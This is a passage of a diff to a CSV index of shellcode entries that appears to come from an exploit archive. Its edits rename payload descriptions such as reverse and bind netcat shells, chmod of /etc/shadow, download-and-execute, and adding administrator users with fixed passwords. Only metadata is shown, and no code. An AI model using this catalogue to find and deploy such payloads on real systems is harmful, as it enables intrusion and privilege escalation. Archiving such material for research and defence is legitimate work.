-13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0 +13647,platforms/win_x86/shellcode/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0 +13648,platforms/win_x86/shellcode/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0 13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",windows,shellcode,0 -13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - Bind nc -lvve/bin/sh -p13377 Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0 -13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 +13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0 +13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0 13671,platforms/lin_x86/shellcode/13671.c,"Linux/x86 - DoS-Badger-Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13673,platforms/lin_x86/shellcode/13673.c,"Linux/x86 - SLoc-DoS Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0 13675,platforms/lin_x86/shellcode/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode,0 -13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 -13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0 -13679,platforms/linux/shellcode/13679.py,"Linux - write() + exit(0) Shellcode (Genearator With Customizable Text)",2010-04-20,Stoke,linux,shellcode,0 +13676,platforms/lin_x86/shellcode/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 +13677,platforms/lin_x86/shellcode/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode,0 +13679,platforms/generator/shellcode/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,generator,shellcode,0 13680,platforms/lin_x86/shellcode/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 13681,platforms/lin_x86/shellcode/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode,0 13682,platforms/lin_x86/shellcode/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 13691,platforms/lin_x86-64/shellcode/13691.c,"Linux/x86-64 - execve(_/bin/sh_); Shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode,0 -13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 +13692,platforms/lin_x86/shellcode/13692.c,"Linux/x86 - Sends _Phuck3d!_ To All Terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode,0 13697,platforms/lin_x86/shellcode/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 13698,platforms/lin_x86/shellcode/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode,0 -13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 (FR) - Download File + Execute Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0 +13699,platforms/win_x86/shellcode/13699.txt,"Windows XP SP2 (French) - Download File + Execute Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode,0 13702,platforms/lin_x86/shellcode/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode,0 13703,platforms/lin_x86/shellcode/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0 13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Download File Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0 -13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0 +13712,platforms/lin_x86/shellcode/13712.c,"Linux/x86 - Disable ASLR Security Shellcode Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode,0 13715,platforms/lin_x86/shellcode/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13716,platforms/lin_x86/shellcode/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode,0 13719,platforms/win_x86-64/shellcode/13719.txt,"Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode,0 -13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - setuid(0) + chmod(_/etc/shadow__ 0666) Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0 -13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13722,platforms/lin_x86/shellcode/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode,0 +13723,platforms/lin_x86/shellcode/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13724,platforms/lin_x86/shellcode/13724.c,"Linux/x86 - kill all running process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 -13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 +13725,platforms/lin_x86/shellcode/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13726,platforms/lin_x86/shellcode/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode,0 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0 @@ -16135,282 +16139,282 @@ id,file,description,date,author,platform,type,port 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 -14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 +14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0 -13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 +13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 -13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Bind 31337/TCP + setreuid (0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 -13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) + chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 +13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 +13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 -14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 +14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 14116,platforms/arm/shellcode/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 -14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0 +14052,platforms/windows/shellcode/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0 14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 -14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 -14142,platforms/arm/shellcode/14142.c,"Linux/ARM - chmod(_/etc/shadow__ 0777) polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 -14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 +14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0 +14142,platforms/arm/shellcode/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 +14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 -14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 -14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 +14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 +14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 14218,platforms/linux/shellcode/14218.c,"Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0 -14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14235,platforms/linux/shellcode/14235.c,"Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 +14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0 +14234,platforms/linux/shellcode/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14235,platforms/linux/shellcode/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14261,platforms/generator/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",generator,shellcode,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 -14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 +14288,platforms/win_x86/shellcode/14288.asm,"Windows x86 - Write-to-file Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 -14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 -14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0 -14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0 -14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bind Shell 2525/TCP Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 -14873,platforms/win_x86/shellcode/14873.asm,"Win32 - Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0 +14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 +14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0 +14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode,0 +14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 +14873,platforms/win_x86/shellcode/14873.asm,"Windows x86 - Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode,0 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 -15063,platforms/win_x86/shellcode/15063.c,"Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0 +15063,platforms/win_x86/shellcode/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 -15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 -15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 +15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 +15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 -15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15315,platforms/arm/shellcode/15315.asm,"ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15316,platforms/arm/shellcode/15316.asm,"ARM - Loader (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 +15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 -15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 -15879,platforms/win_x86/shellcode/15879.txt,"Win32 - Speaking 'You got pwned!' Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 -16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0 -16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind Shell 31337/TCP + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 -16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 -17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod(_/etc/shadow__ 0666) + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 -17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Shell Netcat 6666/TCP Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 -17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 -17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 -20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 -17326,platforms/windows/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 -17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +15712,platforms/generator/shellcode/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",generator,shellcode,0 +15879,platforms/win_x86/shellcode/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking _You got pwned!_ Null-Free Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 +16025,platforms/generator/shellcode/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,generator,shellcode,0 +16026,platforms/bsd_x86/shellcode/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 +16283,platforms/win_x86/shellcode/16283.txt,"Windows x86 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 +17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 +17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 +17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 +17323,platforms/windows/shellcode/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 +20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 +17326,platforms/generator/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",generator,shellcode,0 +17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 -17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 -17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 +17545,platforms/win_x86/shellcode/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 +17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 -17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0 -18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 +17996,platforms/generator/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,generator,shellcode,0 +18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 +18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 -18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 +18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 